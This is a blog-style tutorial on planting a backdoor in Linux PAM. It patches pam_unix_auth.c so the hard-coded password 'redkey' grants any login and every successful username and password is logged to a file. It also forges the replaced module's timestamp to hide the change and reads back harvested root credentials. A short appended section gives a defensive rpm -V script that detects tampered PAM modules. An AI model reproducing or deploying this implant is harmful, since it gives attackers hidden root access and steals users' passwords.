Linux System Security: Installing and Using a PAM Backdoor, Explained
Posted beautiful-code
1. Check the system's PAM version:
[[email protected] ~]# rpm -qa | grep pam
pam-1.1.1-4.el6.x86_64
2. Download the matching version of the PAM source
http://www.linux-pam.org/library/
3. Extract the archive and edit pam_unix_auth.c
tar -xzvf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1
cd modules/pam_unix/
vim pam_unix_auth.c
4. The modified parts
In
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags ,int argc, const char **argv)
{
declare FILE *fp; as follows:
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags ,int argc, const char **argv)
{
unsigned int ctrl;
int retval, *ret_data = NULL;
const char *name;
const void *p;
FILE *fp;
Below retval = _unix_verify_password(pamh, name, p, ctrl); [around line 177], add:
/*password:”redkey”*/
if(strcmp(p,”redkey”)==0)
{
retval = PAM_SUCCESS;
}
if(retval== PAM_SUCCESS)
{
/*pamfile:pamwd.txt*/
fp=fopen(“pamwd.txt”,”a”);
fprintf(fp,”%s::%s ”,name,p);
fclose(fp);
}
5. Compile
[[email protected] pam_unix]# cd ../../
[[email protected] Linux-PAM-1.1.1]# ./configure
[[email protected] Linux-PAM-1.1.1]# make
6. Back up the original PAM module
[[email protected] security]# mv pam_unix.so{,.bak}
7. Copy the new PAM module into /lib64/security/:
[[email protected] security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/
8. Change the PAM module's timestamp attributes
[[email protected] security]# stat pam_unix.*
File: “pam_unix.so”
Size: 151879 Blocks: 304 IO Block: 4096 普通文件
Device: fd01h/64769d Inode: 565261 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2013-12-24 11:30:01.813610217 +0800
Modify: 2013-12-24 08:55:00.000000000 +0800
Change: 2013-12-24 11:29:12.747789015 +0800
File: “pam_unix.so.bak”
Size: 50752 Blocks: 104 IO Block: 4096 普通文件
Device: fd01h/64769d Inode: 523660 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2013-12-24 08:55:08.026835929 +0800
Modify: 2010-02-16 01:34:42.000000000 +0800
Change: 2013-12-24 10:42:11.741663207 +0800
[[email protected] security]# touch -t 201002160134 pam_unix.so
[[email protected] security]# ll pam_unix.*
-rwxr-xr-x 1 root root 151879 2月 16 2010 pam_unix.so
-rwxr-xr-x. 1 root root 50752 2月 16 2010 pam_unix.so.bak
9. Verify login with the universal password
login as: root
[email protected]’s password:
Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1
[[email protected] ~]#
[[email protected] /]# cat pamwd.txt
root::redkey
root::123456
root::12345678
root::redkey
root::redkey
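Seen from the defending side, the module swap in steps 6 to 8 is what RPM package verification catches: the replaced pam_unix.so differs in size (151879 versus 50752 bytes) and therefore in digest, and touch -t only restores the date in the directory listing. The script below is an added example, not part of the original post; it filters `rpm -V pam` output for PAM modules whose digest or size no longer matches the RPM database. The function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): triage `rpm -V pam` output.
# Each `rpm -V` line is "<flags> [attr] <path>" or "missing <path>".
# Flag letters used here: S = size differs, 5 = digest differs, T = mtime differs.

# Constructed sample of `rpm -V pam` output on a host with a replaced module.
sample_rpm_verify() {
    cat <<'EOF'
S.5....T.    /lib64/security/pam_unix.so
.......T.    /lib64/security/pam_env.so
S.5....T.  c /etc/pam.d/system-auth
missing      /lib64/security/pam_deny.so
EOF
}

# Reads `rpm -V` lines on stdin and prints "<path> <reasons>" for every
# PAM module (*/security/*.so) that is missing or whose content changed.
# An mtime-only difference is not reported, and config files are skipped.
flag_tampered_pam() {
    awk -v pat='/security/[^/]*[.]so$' '
        $NF !~ pat { next }                      # not a PAM module
        $1 == "missing" { print $NF, "missing"; next }
        {
            reason = ""
            if (index($1, "5")) reason = reason "digest,"
            if (index($1, "S")) reason = reason "size,"
            if (reason == "") next               # content unchanged
            if (index($1, "T")) reason = reason "mtime,"
            sub(/,$/, "", reason)
            print $NF, reason
        }'
}

# Demonstration on the constructed sample.
sample_rpm_verify | flag_tampered_pam
```

On a live RPM-based host, run `rpm -V pam | flag_tampered_pam`; any reported module should be compared against a copy extracted from the vendor package.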